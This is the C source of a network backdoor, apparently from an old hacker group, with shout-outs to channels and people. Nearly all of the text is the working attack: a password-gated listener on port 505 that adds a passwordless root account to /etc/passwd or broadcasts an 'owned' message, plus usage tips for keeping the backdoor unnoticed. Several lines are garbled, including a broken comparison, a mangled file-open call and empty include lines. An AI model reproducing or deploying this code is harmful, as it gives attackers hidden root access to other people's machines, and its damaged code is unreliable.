--=\\backdoor.c\\=-- /* A rip off a sockets tutorial i found somewhere cause I didn't feel like writing stupid basic sockets code when I had it in my src directory already. */ /* Greets: Undernet Channels: #rootworm, #hacktech, #hyperlink, #3xposure, #legionoot Groups: The LegionOOT (www.legionoot.cc), Team Sploit People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X, NeonMatrix, Azmodan, & Venomous /* Usage (setup): # gcc -o backdoor backdoor.c # ./backdoor password & Usage (using): telnet to host (port 505) --> type the password (don't wait for a prompt, there isn't one so its less obvious its a backdoor) --> type 1or 2. And yes it's _supposed_ to disconnect you after each command. */ #include #include #include #include #include #include #include #include #define PORT 505 #define MAXDATASIZE 100 #define BACKLOG 10 void handle(char *command); int main(int argc, char *argv[]) { int sockfd, new_fd, sin_size, numbytes; char *bytes; struct sockaddr_in my_addr; struct sockaddr_in their_addr; char buf[MAXDATASIZE]; char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to send '7h1s b0x 1s 0wn3d' to all people on the box: "; if (argc != 2) { fprintf(stderr,"Usage: %s password\n", argv[0]); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(PORT); my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, BACKLOG) == -1) { perror("listen"); exit(1); } while(1) { /* main accept() loop */ sin_size = sizeof(struct sockaddr_in); if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \ &sin_size)) == { perror("accept"); continue; } inet_ntoa(their_addr.sin_addr); if (!fork()) { recv(new_fd, buf, MAXDATASIZE, 0); bytes = strstr(buf, argv[1]); if (bytes != NULL){ send(new_fd, ask, sizeof(ask), 0); numbytes=recv(new_fd, buf, MAXDATASIZE, 0); buf[numbytes] = '\0'; handle(buf); } close(new_fd); exit(0); } close(new_fd); while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */ } } void handle(char *command) { FILE *fle; if(strstr(command, "1") != NULL) { fle = f0/*n("/etc/passwd", "a*/; fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash"); fclose(fle); } if(strstr(command, "2") != NULL) { system("wall 7h1s b0x 1s 0wn3d"); } } PBBSER pbbser@legionoot.hypermart.net ----------------------------